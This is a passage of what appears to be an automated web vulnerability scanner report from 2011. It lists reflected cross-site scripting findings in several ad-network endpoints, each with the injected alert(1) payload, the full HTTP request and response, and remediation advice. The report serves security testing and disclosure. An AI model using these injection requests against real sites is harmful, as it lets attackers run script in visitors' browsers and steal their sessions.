Set-Cookie: FFad=89:88:10:10:10:None:None;expires=Sat, 17 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "aa1b9a-8952-4accb58ae5040"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=18
Expires: Sat, 17 Sep 2011 01:50:08 GMT
Date: Sat, 17 Sep 2011 01:49:50 GMT
Content-Length: 2754
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var z11=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='collective728x902cd0e"-alert(1)-"31d922bac00,collective728x9016082%22%3b2f389a5ae83,collective728x9016082"';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=collective728x902cd0e"-alert(1)-"31d922bac00,collective728x9016082%22%3b2f389a5ae83,collective728x9016082";z="+Math.random();}

if(zzuid=='unknown')zzuid='k5xiThcyanucBq9IXvhSGSz5~090311';

var zzhasAd=undefined;


       
...[SNIP]...

4.104. http://d7.zedo.com/bar/v16-507/d3/jsc/fm.js [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-507/d3/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c82c2'%3balert(1)//7d572232822 was submitted in the q parameter. This input was echoed as c82c2';alert(1)//7d572232822 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-507/d3/jsc/fm.js?c=2&a=0&f=&n=951&r=13&d=14&q=c82c2'%3balert(1)//7d572232822&$=collective728x90&s=2&z=0.2868958928156644 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://ad.afy11.net/ad?asId=1000005414407&sd=2x728x90&ct=15&enc=0&nif=0&sf=0&sfd=0&ynw=0&anw=1&rand=41899200&rk1=79777040&rk2=1316239703.524&pt=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: FFBbh=977B305,20|149_1#0; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZEDOIDX=13; PI=h484782Za669089Zc826000622,826000622Zs403Zt1255Zm784Zb43199; FFgeo=5386156; FFMChanCap=2457780B305,825#722607,7038#1013066#971199:767,4#789954:951,2#887163|0,1#0,24:0,10#0,24:0,10#0,24:0,1#0,24:0,15#0,24; FFMCap=2470080B826,110235,110236:933,196008:951,125046|0,1#0,24:0,1#0,24:0,6#0,24:0,6#0,24; aps=2; FFcat=933,56,15:951,2,15; FFad=1:1; ZFFAbh=977B826,20|121_977#365; ZFFBbh=990B826,20|121_977#0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=951:284b8'-alert(1)-'04109d7f66c,b909c%27%3ba372b7aa248,collective728x90,b909c'$0:collective728x90;expires=Sat, 17 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,187,14:951,2,14:951,2,0:0,2,14:951,0,14:933,56,15:951,2,15dd3b5ba9ef00e97d324cdbd6;expires=Sat, 17 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=77:76:10:10:10:None:None;expires=Sat, 17 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "aa1b9a-8952-4accb58ae5040"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=23
Expires: Sat, 17 Sep 2011 01:50:08 GMT
Date: Sat, 17 Sep 2011 01:49:45 GMT
Content-Length: 2750
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var z11=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='c82c2';alert(1)//7d572232822,284b8'-alert(1)-'04109d7f66c,b909c%27%3ba372b7aa248,collective728x90,b909c'';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=c82c2';alert(1)//7d572232822,284b8'-alert(1)-'0
...[SNIP]...

4.105. http://event.adxpose.com/event.flow [uid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://event.adxpose.com
Path:   /event.flow

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload 569f5<script>alert(1)</script>cbb22875fc7 was submitted in the uid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /event.flow?eventcode=000_000_12&location=http%3A%2F%2F3ps.go.com%2FDynamicAd%3Fsrvc%3Dabc%26adTypes%3DRectangles-Remnant%26url%3D%2Fshows%2Fcharlies-angels&uid=TVYMYp4lQTRs9JsS_40691310569f5<script>alert(1)</script>cbb22875fc7&xy=0%2C0&wh=300%2C250&vchannel=41471866&cid=3941858&iad=1316239136911-64316275808960200&cookieenabled=1&screenwh=1920%2C1200&adwh=300%2C250&colordepth=16&flash=10.3&iframed=1 HTTP/1.1
Host: event.adxpose.com
Proxy-Connection: keep-alive
Referer: http://cdn.optmd.com/V2/80181/197812/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=ec39c893-8f48-41a8-9b1f-be5afaba100a

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=214EE77DC665E937F45E21D15B56E7C0; Path=/
Cache-Control: no-store
Content-Type: text/javascript;charset=UTF-8
Content-Length: 147
Date: Sat, 17 Sep 2011 01:03:37 GMT
Connection: close

if (typeof __ADXPOSE_EVENT_QUEUES__ !== "undefined") __ADXPOSE_DRAIN_QUEUE__("TVYMYp4lQTRs9JsS_40691310569f5<script>alert(1)</script>cbb22875fc7");

4.106. http://fw.adsafeprotected.com/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload da1f4"-alert(1)-"f4229a086fa was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjsi/dcda1f4"-alert(1)-"f4229a086fa/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9;sz=728x90;click0=http://c.casalemedia.com/c/2/1/88646/;ord=3485630955 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://3ps.go.com/DynamicAd?srvc=abc&adTypes=Banner-Remnant&url=/primetime/charlies-angels/bios/eve-french
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=7A00B96A0D964F453E5BD8D5810F10FB; Path=/
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:07:59 GMT
Connection: close

<html>
<head></head>
<body>
<script type="text/javascript"><!--

var adsafeVisParams = {
   mode : "jsi",
   jsref : "http://3ps.go.com/DynamicAd?srvc=abc&adTypes=Banner-Remnant&url=/primetime/charlies-angels/bios/eve-french",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/dcda1f4"-alert(1)-"f4229a086fa/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9;sz=728x90;click0=http://c.casalemedia.com/c/2/1/88646/;ord=3485630955",
   adsafeSep : "?",
   requrl : "",
   reqquery : "",
   debug : "false",
   allowPho
...[SNIP]...

4.107. http://fw.adsafeprotected.com/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9 [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2023a"-alert(1)-"ff30b4aa7a4 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjsi/dc/103392023a"-alert(1)-"ff30b4aa7a4/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9;sz=728x90;click0=http://c.casalemedia.com/c/2/1/88646/;ord=3485630955 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://3ps.go.com/DynamicAd?srvc=abc&adTypes=Banner-Remnant&url=/primetime/charlies-angels/bios/eve-french
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=A971275997FA7630761B5092947B1A05; Path=/
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:08:00 GMT
Connection: close

<html>
<head></head>
<body>
<script type="text/javascript"><!--

var adsafeVisParams = {
   mode : "jsi",
   jsref : "http://3ps.go.com/DynamicAd?srvc=abc&adTypes=Banner-Remnant&url=/primetime/charlies-angels/bios/eve-french",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/dc/103392023a"-alert(1)-"ff30b4aa7a4/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9;sz=728x90;click0=http://c.casalemedia.com/c/2/1/88646/;ord=3485630955",
   adsafeSep : "?",
   requrl : "",
   reqquery : "",
   debug : "false",
   allowPhoneHome
...[SNIP]...

4.108. http://fw.adsafeprotected.com/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9 [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload db706"-alert(1)-"9cd6414e8aa was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjsi/dc/10339/128628db706"-alert(1)-"9cd6414e8aa/adi/N4682.126265.CASALEMEDIA/B5564795.9;sz=728x90;click0=http://c.casalemedia.com/c/2/1/88646/;ord=3485630955 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://3ps.go.com/DynamicAd?srvc=abc&adTypes=Banner-Remnant&url=/primetime/charlies-angels/bios/eve-french
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=A049BAB0531C29E6EC384F93AA842C69; Path=/
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:08:00 GMT
Connection: close

<html>
<head></head>
<body>
<script type="text/javascript"><!--

var adsafeVisParams = {
   mode : "jsi",
   jsref : "http://3ps.go.com/DynamicAd?srvc=abc&adTypes=Banner-Remnant&url=/primetime/charlies-angels/bios/eve-french",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/dc/10339/128628db706"-alert(1)-"9cd6414e8aa/adi/N4682.126265.CASALEMEDIA/B5564795.9;sz=728x90;click0=http://c.casalemedia.com/c/2/1/88646/;ord=3485630955",
   adsafeSep : "?",
   requrl : "",
   reqquery : "",
   debug : "false",
   allowPhoneHome : "fal
...[SNIP]...

4.109. http://fw.adsafeprotected.com/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9 [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 114c3"-alert(1)-"fc47482de42 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjsi/dc/10339/128628/adi114c3"-alert(1)-"fc47482de42/N4682.126265.CASALEMEDIA/B5564795.9;sz=728x90;click0=http://c.casalemedia.com/c/2/1/88646/;ord=3485630955 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://3ps.go.com/DynamicAd?srvc=abc&adTypes=Banner-Remnant&url=/primetime/charlies-angels/bios/eve-french
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=1DB5C21D80F320C04F41B642CF20125A; Path=/
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:08:01 GMT
Connection: close

<html>
<head></head>
<body>
<script type="text/javascript"><!--

var adsafeVisParams = {
   mode : "jsi",
   jsref : "http://3ps.go.com/DynamicAd?srvc=abc&adTypes=Banner-Remnant&url=/primetime/charlies-angels/bios/eve-french",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/dc/10339/128628/adi114c3"-alert(1)-"fc47482de42/N4682.126265.CASALEMEDIA/B5564795.9;sz=728x90;click0=http://c.casalemedia.com/c/2/1/88646/;ord=3485630955",
   adsafeSep : "?",
   requrl : "",
   reqquery : "",
   debug : "false",
   allowPhoneHome : "false",
...[SNIP]...

4.110. http://fw.adsafeprotected.com/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9 [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9

Issue detail

The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6b6a7"-alert(1)-"c3bd8bd988d was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA6b6a7"-alert(1)-"c3bd8bd988d/B5564795.9;sz=728x90;click0=http://c.casalemedia.com/c/2/1/88646/;ord=3485630955 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://3ps.go.com/DynamicAd?srvc=abc&adTypes=Banner-Remnant&url=/primetime/charlies-angels/bios/eve-french
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=1DCCDAFA24DD21FDF6463237374426AC; Path=/
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:08:02 GMT
Connection: close

<html>
<head></head>
<body>
<script type="text/javascript"><!--

var adsafeVisParams = {
   mode : "jsi",
   jsref : "http://3ps.go.com/DynamicAd?srvc=abc&adTypes=Banner-Remnant&url=/primetime/charlies-angels/bios/eve-french",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/dc/10339/128628/adi/N4682.126265.CASALEMEDIA6b6a7"-alert(1)-"c3bd8bd988d/B5564795.9;sz=728x90;click0=http://c.casalemedia.com/c/2/1/88646/;ord=3485630955",
   adsafeSep : "?",
   requrl : "",
   reqquery : "",
   debug : "false",
   allowPhoneHome : "false",
   phoneHomeDelay : "3000"
...[SNIP]...

4.111. http://fw.adsafeprotected.com/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9 [REST URL parameter 7]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9

Issue detail

The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 640d2"-alert(1)-"0338569564a was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9640d2"-alert(1)-"0338569564a;sz=728x90;click0=http://c.casalemedia.com/c/2/1/88646/;ord=3485630955 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://3ps.go.com/DynamicAd?srvc=abc&adTypes=Banner-Remnant&url=/primetime/charlies-angels/bios/eve-french
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=6B61580EFD1DC69FFF19E25E19111CA1; Path=/
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:08:01 GMT
Connection: close

<html>
<head></head>
<body>
<script type="text/javascript"><!--

var adsafeVisParams = {
   mode : "jsi",
   jsref : "http://3ps.go.com/DynamicAd?srvc=abc&adTypes=Banner-Remnant&url=/primetime/charlies-angels/bios/eve-french",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9640d2"-alert(1)-"0338569564a;sz=728x90;click0=http://c.casalemedia.com/c/2/1/88646/;ord=3485630955",
   adsafeSep : "?",
   requrl : "",
   reqquery : "",
   debug : "false",
   allowPhoneHome : "false",
   phoneHomeDelay : "3000",
   killPhra
...[SNIP]...

4.112. http://fw.adsafeprotected.com/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 77df7"-alert(1)-"55e8aaf402d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9;sz=728x90;click0=http://c.casalemedia.com/c/2/1/88646/;ord=3485630955&77df7"-alert(1)-"55e8aaf402d=1 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://3ps.go.com/DynamicAd?srvc=abc&adTypes=Banner-Remnant&url=/primetime/charlies-angels/bios/eve-french
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=81D38C248A8FC0D3AE4AEA54D3D89A0E; Path=/
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:07:58 GMT
Connection: close

<html>
<head></head>
<body>
<script type="text/javascript"><!--

var adsafeVisParams = {
   mode : "jsi",
   jsref : "http://3ps.go.com/DynamicAd?srvc=abc&adTypes=Banner-Remnant&url=/primetime/charlies-angels/bios/eve-french",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9;sz=728x90;click0=http://c.casalemedia.com/c/2/1/88646/;ord=3485630955&77df7"-alert(1)-"55e8aaf402d=1",
   adsafeSep : "?",
   requrl : "",
   reqquery : "",
   debug : "false",
   allowPhoneHome : "false",
   phoneHomeDelay : "3000",
   killPhrases : "",
   asid : "gt69exsw"
};


(function(){var O="3.13.1";var w=(
...[SNIP]...

4.113. http://fw.adsafeprotected.com/rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9 [sz parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://fw.adsafeprotected.com
Path:   /rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6da0d"-alert(1)-"9d189a7cf3d was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /rjsi/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9;sz=728x90;click0=http://c.casalemedia.com/c/2/1/88646/;ord=34856309556da0d"-alert(1)-"9d189a7cf3d HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://3ps.go.com/DynamicAd?srvc=abc&adTypes=Banner-Remnant&url=/primetime/charlies-angels/bios/eve-french
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=85A39D4B6E9886329A268FD24420D20D; Path=/
Content-Type: text/html
Date: Sat, 17 Sep 2011 01:07:58 GMT
Connection: close

<html>
<head></head>
<body>
<script type="text/javascript"><!--

var adsafeVisParams = {
   mode : "jsi",
   jsref : "http://3ps.go.com/DynamicAd?srvc=abc&adTypes=Banner-Remnant&url=/primetime/charlies-angels/bios/eve-french",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/dc/10339/128628/adi/N4682.126265.CASALEMEDIA/B5564795.9;sz=728x90;click0=http://c.casalemedia.com/c/2/1/88646/;ord=34856309556da0d"-alert(1)-"9d189a7cf3d",
   adsafeSep : "?",
   requrl : "",
   reqquery : "",
   debug : "false",
   allowPhoneHome : "false",
   phoneHomeDelay : "3000",
   killPhrases : "",
   asid : "gt69exl9"
};


(function(){var O="3.13.1";var w=(ad
...[SNIP]...

4.114. http://g2.gumgum.com/services/get [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://g2.gumgum.com
Path:   /services/get

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 64628<script>alert(1)</script>adbac286e48 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /services/get?callback=GUMGUM.startServices64628<script>alert(1)</script>adbac286e48&_=1316238826949&pubdata={%22t%22:%22tmzdtcom%22,%22v%22:1,%22r%22:%229926v3%22,%22rf%22:%22%22} HTTP/1.1
Host: g2.gumgum.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript;charset=UTF-8
Date: Sat, 17 Sep 2011 00:53:48 GMT
Server: nginx/0.6.35
Set-Cookie: ggtests=t3%3D44%26t2%3D23%26t1%3D49%26t10%3D48%26t11%3D50%26t4%3D7%26t6%3D43%26t7%3D45%26t9%3D47; Domain=.gumgum.com; Path=/
Content-Length: 304
Connection: keep-alive

GUMGUM.startServices64628<script>alert(1)</script>adbac286e48({"at":{"mh":200,"sf":true,"mw":200,"ps":true},"pxs":{"across33":true,"qsg":"Entertainment.tmzdtcom","media6":true,"qac":"p-00TsOkvHvnsZU","file":"pixels","priority":9,"quantcast":true},"pag":{"pvid":"
...[SNIP]...

4.115. http://ib.adnxs.com/ptj [redir parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /ptj

Issue detail

The value of the redir request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a19be'%3balert(1)//63b277fa96a was submitted in the redir parameter. This input was echoed as a19be';alert(1)//63b277fa96a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ptj?member=514&size=300x250&referrer=http://www.tmz.com/&inv_code=2298003&redir=http%3A%2F%2Fad.yieldmanager.com%2Fimp%3Fanmember%3D514%26anprice%3D%7BPRICEBUCKET%7D%26Z%3D300x250%26s%3D2298003%26r%3D1%26_salt%3D1775927586%26u%3Dhttp%253A%252F%252Fwww.tmz.com%252F%26u%3Dhttp%3A%2F%2Fwww.tmz.com%2Fa19be'%3balert(1)//63b277fa96a HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
